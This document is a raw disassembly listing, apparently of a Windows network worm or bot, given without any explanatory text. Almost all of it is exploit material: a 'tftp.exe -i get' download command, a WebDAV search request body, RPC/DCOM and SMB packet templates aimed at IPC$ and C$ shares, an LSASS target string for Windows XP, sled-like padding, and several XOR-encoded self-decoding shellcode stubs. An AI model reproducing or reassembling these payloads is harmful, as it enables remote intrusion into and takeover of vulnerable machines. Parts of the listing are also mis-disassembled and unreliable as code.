; DATA XREF: sub_411EDA+72�o
dd 8D34408Bh, 408B7C40h, 3D08B3Ch, 0CA8B3C40h, 8B784803h
dd 0DA8B2041h, 331C5903h, 57F633FFh, 3CA8B57h, 7981100Ch
dd 7373650Ah, 8B027541h, 3798133h, 72685474h, 3B8B0275h
dd 8304C083h, 0F68504C3h, 0FF85DB74h, 0F203D774h, 0E857FA03h
dword_4302E4 dd 12h aTftp_exeIGet db 'tftp.exe -i get ',0 ; DATA XREF: sub_411EDA+96�o
aJ_1 db 'j',0
db 0E8h
dword_4302FD dd 17h ; ---------------------------------------------------------------------------
jnz short near ptr byte_430304
retn
; ---------------------------------------------------------------------------
byte_430304 db 0E8h ; CODE XREF: .text:00430301�j
dword_430305 dd 1 byte_430309 db 0, 6Ah, 0 ; DATA XREF: sub_411EDA+EC�o
dd 7E8h
db 0, 0Fh, 84h
dword_430313 dd 0FFFFFFEDh ; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
pop eax
pop ebx
pop ebp
push eax
sub esp, 54h
xor eax, eax
mov edi, esp
lea ecx, [eax+40h]
mov edx, edi
rep stosb
mov al, 44h
stosd
push edi
push edx
push ecx
push ecx
push 28h
push 1
push ecx
push ecx
push ebp
push ebx
call esi
add esp, 54h
test eax, eax
retn
; ---------------------------------------------------------------------------
align 8
loc_430348: ; DATA XREF: sub_413C88:loc_413DA1�o
mov edi, ecx
xor al, al
inc al
repne scasb
jmp edi
; ---------------------------------------------------------------------------
align 8
a?xmlVersion1_0 db '<?xml version="1.0"?>',0Dh,0Ah ; DATA XREF: sub_413C88+18B�o
db '<g:searchrequest xmlns:g="DAV:">',0Dh,0Ah
db '<g:sql>',0Dh,0Ah
db 'Select "DAV:displayname" from scope()',0Dh,0Ah
db '</g:sql>',0Dh,0Ah
db '</g:searchrequest>',0Dh,0Ah,0
dword_4303E0 dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0 ; .text:004147B1�o
dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_430430 dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
; DATA XREF: sub_41432A+12C�o
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dword_430794 dd 20h, 0 dd 20h, 5C005Ch, 0
off_4307A8 dd offset off_43005C ; DATA XREF: sub_41432A+177�o
a12345611111111:
unicode 0, <$\123456111111111111111.doc>,0
align 8
dword_4307E8 dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0 dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
aFxnbfxfxnbfxfx: ; DATA XREF: sub_41432A+4A�o
; sub_41432A+90�o
unicode 0, <FXNBFXFXNBFXFXFXFX>
dd 0FFFFFFFFh, 2 dup(7FFDE0CCh), 0
aRrrrrrrrrrrrrr db ''
db ''
db '',0
dword_4308F8 dd 10016C6h dword_4308FC dd 100139Dh ; sub_41432A+115�r
; ---------------------------------------------------------------------------
loc_430900: ; DATA XREF: .text:0041497A�o
call $+5
pop eax
xor ax, ax
loc_430909: ; CODE XREF: .text:00430910�j
; .text:00430919�j
inc eax
cmp dword ptr [eax], 6D6F6364h
jnz short loc_430909
cmp dword ptr [eax+4], 72307868h
jnz short loc_430909
add eax, 8
jmp eax
; ---------------------------------------------------------------------------
aRrrrrrrrrrrr_0 db ''
db ''
db ''
db '',0
align 8
dword_430A28 dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0 dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dd 20h, 0
dd 20h, 5C005Ch, 0
dd offset off_43005C
a123456111111_0:
unicode 0, <$\123456111111111111111.doc>,0
align 10h
dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0
dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 3 dup(0)
a127_0_0_1Ipc:
unicode 0, <127.0.0.1\IPC$\>
; ---------------------------------------------------------------------------
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
loc_430E8C: ; CODE XREF: .text:00431094�j
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
loc_43105F: ; CODE XREF: .text:004310C7�j
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
jmp loc_430E8C
; ---------------------------------------------------------------------------
db 3 dup(45h)
; ---------------------------------------------------------------------------
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
loc_4310BD: ; CODE XREF: .text:004310CB�j
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
inc ebp
add [esp+edx+54h], cl
jl short loc_43105F
mov ah, 0A1h
ja short loc_4310BD
mov eax, ds:0AFA977EDh
mov eax, ds:41414177h
inc ecx
; ---------------------------------------------------------------------------
dd 77FCC662h
off_4310DC dd offset dword_480D78 ; DATA XREF: sub_414DED+73�r
; .text:00414F92�r ...
; ---------------------------------------------------------------------------
jmp short loc_4310F2
; =============== S U B R O U T I N E =======================================
sub_4310E2 proc far ; CODE XREF: sub_4310E2:loc_4310F2�p
pop ebx
dec ebx
xor ecx, ecx
mov cx, 125h
loc_4310EA: ; CODE XREF: sub_4310E2+C�j
xor byte ptr [ebx+ecx], 99h
loop loc_4310EA
jmp short loc_4310F7
; ---------------------------------------------------------------------------
loc_4310F2: ; CODE XREF: .text:004310E0�j
call near ptr sub_4310E2
loc_4310F7: ; CODE XREF: sub_4310E2+E�j
jo short loc_43115B
cdq
cdq
cdq
mov ch, 38h
test eax, 12999999h
fst dword ptr [ebp+3485E912h]
adc dh, cl
xchg eax, ecx
adc ch, [esi-0Dh]
popf
sal byte ptr [ecx+2], 99h
cdq
cdq
jnp short loc_431179
icebp
stosb
stosd
cdq
cdq
icebp
out dx, al
jmp far ptr 128Fh:66CDC6ABh
; ---------------------------------------------------------------------------
db 71h
dd 71C09DF3h, 9999991Bh, 7518607Bh, 99999809h, 9898F1CDh
dd 0CF669999h, 0C9C9C989h, 0D9C9D9C9h, 8DCF66C9h, 0E6F14112h
dd 0F1989999h, 4B9D999Bh
; ---------------------------------------------------------------------------
adc dl, [ebp-0Dh]
loc_43115B: ; CODE XREF: sub_4310E2:loc_4310F7�j
mov eax, ecx
retf 0CF66h
; ---------------------------------------------------------------------------
dd 0EC591C81h, 0F4FAF1D3h, 0FF1099FDh, 0CD751AA9h, 0F3BDA514h
dd 7B32C08Ch
db 64h
; ---------------------------------------------------------------------------
loc_431179: ; CODE XREF: sub_4310E2+35�j
pop edi
fnstsw word ptr [ebp-22982277h]
mov ebp, 0BDC510A4h
rcl dword ptr [eax], 1
lds edi, [ebp-423AEF2Bh]
leave
adc al, 0DDh
mov ebp, 0C8C9CD89h
enter 0FFFFF3C8h, 98h
enter 66C8h, 0EFh
test eax, 9DCF66C8h
adc dl, [ebp-0Dh]
db 66h, 66h
test al, 66h
iret
sub_4310E2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
xchg eax, ecx
retf 0CF66h
; ---------------------------------------------------------------------------
dw 6685h
dd 0CFC895CFh, 12A5DC12h, 9AE1B1CDh, 0EB12CB4Ch, 0AA6C9AB9h
dd 34D8D050h, 42AA5C9Ah, 0A3892796h, 5891ED4Fh, 439A9452h
dd 0A26872D9h, 0C37EEC86h, 9ABDC312h, 9512FF44h, 85C312D2h
dd 9D12449Ah, 325C9A12h, 715AC0C7h, 66666699h, 7597D717h
dd 8F2A67EBh, 579C4034h, 0F9795776h, 0A2657452h, 346C9040h
dd 0F9336075h, 0E05FE07Eh, 0
; ---------------------------------------------------------------------------
loc_431220: ; DATA XREF: sub_4152B5+112�o
; sub_4152B5+1D9�o
jmp short loc_431232
; =============== S U B R O U T I N E =======================================
sub_431222 proc near ; CODE XREF: sub_431222:loc_431232�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_43122A: ; CODE XREF: sub_431222+C�j
xor byte ptr [edx+ecx], 99h
loop loc_43122A
jmp short loc_431237
; ---------------------------------------------------------------------------
loc_431232: ; CODE XREF: .text:loc_431220�j
call sub_431222
loc_431237: ; CODE XREF: sub_431222+E�j
jo short near ptr dword_4311B0+1Eh
cwde
cdq
cdq
retn
sub_431222 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
word_4312D0 dw 4B9Dh ; DATA XREF: sub_4152B5+E5�w
dw 59AAh
dd 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh, 66CAC9C9h
dd 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h, 10627B17h
dd 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h, 0AACFC989h
dd 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h, 0C8C9A5DEh
dd 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h, 591C3559h
dd 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h, 66677671h
dd 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh, 0F8FCEBDAh
dd 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h, 0F8FCEBF1h
dd 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h, 0AAC6ABEAh
dd 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h, 0F0F599FDh
dd 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh, 0FAF6EAFCh
dd 99EDFCF2h, 0
dword_4313B8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: .text:00415733�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 2 dup(0)
dword_431448 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:0041575F�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 2 dup(0)
dword_4314F8 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00415787�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_4315D8 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4152B5+53�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC_4: ; DATA XREF: sub_4152B5+90�o
unicode 0, <C$>,0
a????? db '?????',0
align 10h
dword_431640 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4152B5+28B�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 2 dup(0)
dword_4316B0 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4152B5+2B2�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_431758 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4152B5+383�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_4317D8 dd offset loc_401495 ; DATA XREF: sub_4152B5+3A6�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_407079+3
dd 1, 0
dd 1, 0
dd offset loc_407079+3
dd 1, 0
dd 1, 0
dd offset loc_407079+3
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 2 dup(0)
dword_431870 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4152B5+2E2�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 2 dup(0)
dword_4318E0 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4152B5+307�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 2 dup(0)
dword_431958 dd 0 dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 2 dup(0)
word_4319E0 dw 0AD9Dh ; DATA XREF: sub_415175+2A�r
; sub_4152B5+CC�r
align 4
dd 2 dup(0)
aWinxpProfessio db 'WinXP Professional [universal] lsass.exe ',0
align 10h
dword_431A20 dd 1004600h ; sub_4152B5+223�r
dd 1, 326E6957h, 7250206Bh, 7365666Fh, 6E6F6973h, 20206C61h
dd 755B2020h, 6576696Eh, 6C617372h, 656E205Dh, 70617274h
dd 6C6C642Eh, 2 dup(0)
dd 7515123Ch, 2, 326E6957h, 6441206Bh, 636E6176h, 53206465h
dd 65767265h, 535B2072h, 205D3450h, 20202020h, 656E2020h
dd 70617274h, 6C6C642Eh, 2 dup(0)
dd 751C123Ch, 0Fh dup(0)
; ---------------------------------------------------------------------------
loc_431AD8: ; DATA XREF: .text:004159D4�o
; .text:00415A52�o
jmp short loc_431AEA
; =============== S U B R O U T I N E =======================================
sub_431ADA proc near ; CODE XREF: sub_431ADA:loc_431AEA�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_431AE2: ; CODE XREF: sub_431ADA+C�j
xor byte ptr [edx+ecx], 99h
loop loc_431AE2
jmp short loc_431AEF
; ---------------------------------------------------------------------------
loc_431AEA: ; CODE XREF: .text:loc_431AD8�j
call sub_431ADA
loc_431AEF: ; CODE XREF: sub_431ADA+E�j
jo short near ptr dword_431A5C+2Ah
cwde
cdq
cdq
retn
sub_431ADA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
word_431B88 dw 4B9Dh ; DATA XREF: .text:004159B5�w
dw 59AAh
dd 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh, 66CAC9C9h
dd 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h, 10627B17h
dd 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h, 0AACFC989h
dd 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h, 0C8C9A5DEh
dd 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h, 591C3559h
dd 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h, 66677671h
dd 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh, 0F8FCEBDAh
dd 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h, 0F8FCEBF1h
dd 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h, 0AAC6ABEAh
dd 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h, 0F0F599FDh
